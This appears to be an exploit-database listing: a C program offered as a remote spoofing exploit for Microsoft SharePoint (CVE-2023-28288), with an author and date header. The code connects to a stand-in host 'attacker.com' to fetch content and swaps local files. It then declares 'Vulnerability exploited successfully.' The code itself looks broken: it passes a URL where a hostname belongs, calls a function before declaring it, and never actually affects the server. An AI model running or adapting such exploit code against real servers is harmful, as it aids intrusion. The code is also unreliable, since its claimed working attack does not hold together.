Share
## https://sploitus.com/exploit?id=PACKETSTORM:173126
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing  
// Date: 2023-06-20  
// country: Iran  
// Exploit Author: Amirhossein Bahramizadeh  
// Category : Remote  
// Vendor Homepage:  
// Microsoft SharePoint Foundation 2013 Service Pack 1  
// Microsoft SharePoint Server Subscription Edition  
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1  
// Microsoft SharePoint Server 2019  
// Microsoft SharePoint Enterprise Server 2016  
// Tested on: Windows/Linux  
// CVE : CVE-2023-28288  
  
#include <windows.h>  
#include <stdio.h>  
  
  
// The vulnerable SharePoint server URL  
const char *server_url = "http://example.com/";  
  
// The URL of the fake SharePoint server  
const char *fake_url = "http://attacker.com/";  
  
// The vulnerable SharePoint server file name  
const char *file_name = "vuln_file.aspx";  
  
// The fake SharePoint server file name  
const char *fake_file_name = "fake_file.aspx";  
  
int main()  
{  
HANDLE file;  
DWORD bytes_written;  
char file_contents[1024];  
  
// Create the fake file contents  
sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");  
  
// Write the fake file to disk  
file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);  
if (file == INVALID_HANDLE_VALUE)  
{  
printf("Error creating fake file: %d\n", GetLastError());  
return 1;  
}  
if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))  
{  
printf("Error writing fake file: %d\n", GetLastError());  
CloseHandle(file);  
return 1;  
}  
CloseHandle(file);  
  
// Send a request to the vulnerable SharePoint server to download the file  
sprintf(file_contents, "%s%s", server_url, file_name);  
file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);  
if (file == INVALID_HANDLE_VALUE)  
{  
printf("Error creating vulnerable file: %d\n", GetLastError());  
return 1;  
}  
if (!InternetReadFileUrl(file_contents, file))  
{  
printf("Error downloading vulnerable file: %d\n", GetLastError());  
CloseHandle(file);  
return 1;  
}  
CloseHandle(file);  
  
// Replace the vulnerable file with the fake file  
if (!DeleteFile(file_name))  
{  
printf("Error deleting vulnerable file: %d\n", GetLastError());  
return 1;  
}  
if (!MoveFile(fake_file_name, file_name))  
{  
printf("Error replacing vulnerable file: %d\n", GetLastError());  
return 1;  
}  
  
// Send a request to the vulnerable SharePoint server to trigger the vulnerability  
sprintf(file_contents, "%s%s", server_url, file_name);  
if (!InternetReadFileUrl(file_contents, NULL))  
{  
printf("Error triggering vulnerability: %d\n", GetLastError());  
return 1;  
}  
  
// Print a message indicating that the vulnerability has been exploited  
printf("Vulnerability exploited successfully.\n");  
  
return 0;  
}  
  
BOOL InternetReadFileUrl(const char *url, HANDLE file)  
{  
HINTERNET internet, connection, request;  
DWORD bytes_read;  
char buffer[1024];  
  
// Open an Internet connection  
internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);  
if (internet == NULL)  
{  
return FALSE;  
}  
  
// Connect to the server  
connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);  
if (connection == NULL)  
{  
InternetCloseHandle(internet);  
return FALSE;  
}  
  
// Send the HTTP request  
request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);  
if (request == NULL)  
{  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
if (!HttpSendRequest(request, NULL, 0, NULL, 0))  
{  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
  
// Read the response data  
while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)  
{  
if (file != NULL)  
{  
// Write the data to disk  
if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))  
{  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return FALSE;  
}  
}  
}  
  
InternetCloseHandle(request);  
InternetCloseHandle(connection);  
InternetCloseHandle(internet);  
return TRUE;  
}